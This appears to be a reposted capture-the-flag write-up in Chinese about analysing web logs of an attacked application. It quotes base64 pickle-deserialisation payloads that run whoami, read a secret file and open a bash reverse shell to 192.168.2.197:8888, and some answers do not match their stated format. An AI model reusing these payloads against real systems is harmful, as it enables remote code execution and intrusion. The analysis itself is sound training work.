全網最新最全首屆“隴劍杯”網絡安全大賽完整WIRTEUP --- 簡單日志分析(3題)


題目描述

某應用程序被攻擊,請分析日志后作答:
 
7.1   黑客攻擊的參數是______。(如有字母請全部使用小寫)
 
wp:
去除404剩下的就是我們要分析的

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnd2hvYW1pJwpwMQowKGcwCmxwMgowKEkwCnRwMwowKGczCkkwCmRwNAowY29zCnN5c3RlbQpwNQowZzUKKGcxCnRSLg== HTTP/1.1" 500 -(base64解碼user值后 =為whomai)

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -(cat /Th4s_IS_VERY_Import_Fi1e)

127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -(bash -i >& /dev/tcp/192.168.2.197/8888 0>&1)

flag:

user,這里我以為是命令的參數,其實是url的參數

 

7.2  黑客查看的秘密文件的絕對路徑是_____________。

wp:

請看上題
flag:

Th4s_IS_VERY_Import_Fi1e

 

 

7.3  黑客反彈shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)

wp:

請看上題
flag:

192.168.2.197#8888

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM